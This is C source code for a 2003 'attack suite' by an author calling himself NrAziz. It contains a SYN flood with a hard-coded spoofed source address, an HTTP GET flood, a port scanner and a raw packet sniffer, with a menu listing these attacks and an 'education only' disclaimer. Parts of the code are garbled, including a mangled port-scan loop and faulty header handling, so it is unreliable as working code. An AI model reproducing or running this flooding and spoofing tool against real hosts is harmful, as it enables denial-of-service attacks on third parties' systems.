Poly attacksuite by Polygrithm/Whackerz
/* * Poly Attack Suit v 01 */ /* * Coded by NrAziz (C) 2003 . */ /* The code is for self education purpose,If used in malicious activity the * author will not be held responsible.The code is for hackers who want to extend their * hacking capabilities in network programming.A very straight-forward,structured * and easy to understand code. * 7h4n5 70 Mix73r!, Y0u kn0w I 4m 4dv4ncin9... */ /* I 'll appreciate your critisism against my code.If you found any bugs or if you found any logical errors let me know . * The more you critisise me the more i'll improve my hacking and coding skillz...*/ /* May be i'll make this app more sophisticated in a next version. */ /************ f0r c0mm3n75'n 5u99357i0n5 'n F33dBack 3m4i1 m3! polygrithm@hotmail.com ************/ #include "stdio.h" #include "netinet/ip.h" #include "sys/socket.h" #include "sys/types.h" #include "errno.h" #include "netinet/in.h" #include "netinet/tcp.h" #include "stdlib.h" #include "unistd.h" #include "signal.h" #include "netdb.h" #include "arpa/inet.h" #define PORT 80 #define IP_SIZE sizeof(struct iphdr) #define IP_TCP_SIZE sizeof(struct iphdr)+sizeof(struct tcphdr) #define BIG 1024 #define MORE_BIG 4096 #define MAX_PORTS 65535 typedef unsigned short int u_16; void sniff() { int sockfd; struct Packet{ struct iphdr iph; struct tcphdr tcph; }pkt; struct sockaddr_in serv; struct in_addr addr; if((sockfd=socket(AF_INET,SOCK_RAW,0x06))==-1) { perror("socket"); exit(1); } int sz=sizeof(struct sockaddr_in); for(;;) { if(recvfrom(sockfd,&pkt,sizeof(pkt),0,(struct sockaddr*)&serv,&sz)==-1) { perror("recvfrom"); exit(1); } printf("-=-=-Packet Captured-=-=-\n"); addr.s_addr=pkt.iph.saddr; printf("Source IP:%s\n",inet_ntoa(addr)); addr.s_addr=pkt.iph.daddr; printf("Destination IP:%s\n",inet_ntoa(addr)); printf("Source Port:%d\n",ntohs(pkt.tcph.source)); printf("Destination Port:%d\n",ntohs(pkt.tcph.dest)); printf("TTL:%d\n",pkt.iph.ttl); printf("Packet Length:%d\n",pkt.iph.tot_len); printf("sequence:%d\n",ntohl(pkt.tcph.seq)); printf("fin:%d\n",pkt.tcph.fin); printf("syn:%d\n",pkt.tcph.syn); printf("------------------------------------\n"); } } /* A dirty algorithm 8D */ char * resolver(char *host_ip){ struct in_addr ip; char* charip; if((ip.s_addr=inet_addr(host_ip))==-1){ struct hostent *h; if((h=gethostbyname(host_ip))==NULL){ perror("gethostbyname"); exit(-1); } charip=(char *)inet_ntoa(*((struct in_addr*)h->h_addr)); return charip; exit(1); } return host_ip; } u_16 cksum(u_16 *addr,int len) { register int sum=0; u_short answer=0; register u_short *w=addr; register int nleft=len; while(nleft>1) { sum+=*w++; nleft-=2; } if(nleft==1) { *(u_char*)&answer=*(u_char*)w; sum+=answer; } sum=(sum>>16)+(sum & 0xffff); sum+=(sum>>16); answer=~sum; return answer; } void scan_ports(char *target) { struct sockaddr_in sin; struct servent *serv; int sockfd,i,status; for(i=0;is_name); } close(sockfd); } } void rawsyn(char *target){ int sockfd,optval; char load[IP_TCP_SIZE]; struct sockaddr_in sin; struct iphdr *iph=(struct iphdr*)load; struct tcphdr *tcph=(struct tcphdr*)load+IP_SIZE; if((sockfd=socket(AF_INET,SOCK_RAW,0x06))==-1) { perror("socket"); exit(1); } iph->ihl=5; iph->version=4; iph->tos=0; iph->tot_len=IP_TCP_SIZE; iph->id=htonl(31337); iph->ttl=255; iph->protocol=0x06; iph->check=0; iph->saddr=inet_addr("11.12.13.14"); /*strange ip ;) 5p00f3d */ iph->daddr=inet_addr(target); tcph->source=htons(rand()%65535); tcph->dest=htons(rand()%65535); tcph->seq=random(); tcph->ack_seq=0; tcph->doff=0; tcph->syn=1; tcph->window=htonl(65535); tcph->check=0; tcph->urg_ptr=0; iph->check=cksum((u_16 *)load,IP_TCP_SIZE); tcph->check=cksum((u_16 *)load,IP_TCP_SIZE); sin.sin_addr.s_addr=iph->daddr; sin.sin_family=AF_INET; sin.sin_port=tcph->source; if(setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,&optval,sizeof(int))==-1) { perror("setsockopt"); exit(1); } while(1) { if(sendto(sockfd,load,IP_TCP_SIZE,0,(struct sockaddr*)&sin,sizeof(sin))==-1) { perror("sendto"); exit(-1); } else printf("-> "); } } /*May be in the next version it will be multi-threaded.. WOooOAh*/ void getRequests(char *target) { int sockfd; struct sockaddr_in sin; char *x,y[BIG],z[MORE_BIG]; int len; pid_t pid; if((pid=fork())<0) { perror("fork"); exit(1); } else if(pid>0) { exit(1); } else if(pid==0) { if((sockfd=socket(AF_INET,SOCK_STREAM,0))==-1) { perror("socket"); exit(1); } sin.sin_addr.s_addr=inet_addr(target); sin.sin_port=htons(PORT); sin.sin_family=AF_INET; bzero(&(sin.sin_zero),8); if(connect(sockfd,(struct sockaddr*)&sin,sizeof(struct sockaddr))==-1) { fprintf(stdout,"connection out...\n"); exit(1); } x="GET / HTTP/1.1\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*\r\nAccept-Language: en-us\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: %s\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive"; len=strlen(x); snprintf(y,len,x); if(send(sockfd,y,len,0)==-1) { perror("send"); exit(1); } if(recv(sockfd,z,MORE_BIG,0)==-1) { perror("recv"); exit(1); } } } int main(int argc,char **argv) { int opt; if((opt=getopt(argc,argv,"p:s:g:nb"))==-1) { printf("Usage:%s [Options] \n",argv[0]); printf("Options:\n-s:syn flood against the target\n" "-g:Get request against the target\n" "-p:Scan for open ports\n" "-n:Sniffer,Captures Tcp/Ip packets on a network (Does'nt require an IP)\n"); exit(-1); } char *target; switch(opt) { case 's': { printf("Attacking target...\n"); printf("Resolving:[%s]...\n",optarg); target=resolver(optarg); sleep(1); rawsyn(target); break; } case 'g': { target=resolver(optarg); printf("Get request flood:%s\n",optarg); getRequests(target); break; } case 'n': { printf("Capturing network traffic...\n"); sniff(); break; } case 'p': { target=resolver(optarg); printf("Scanning open ports...\n"); scan_ports(target); break; } default: break; } return 0; } /*3l337 57y13*/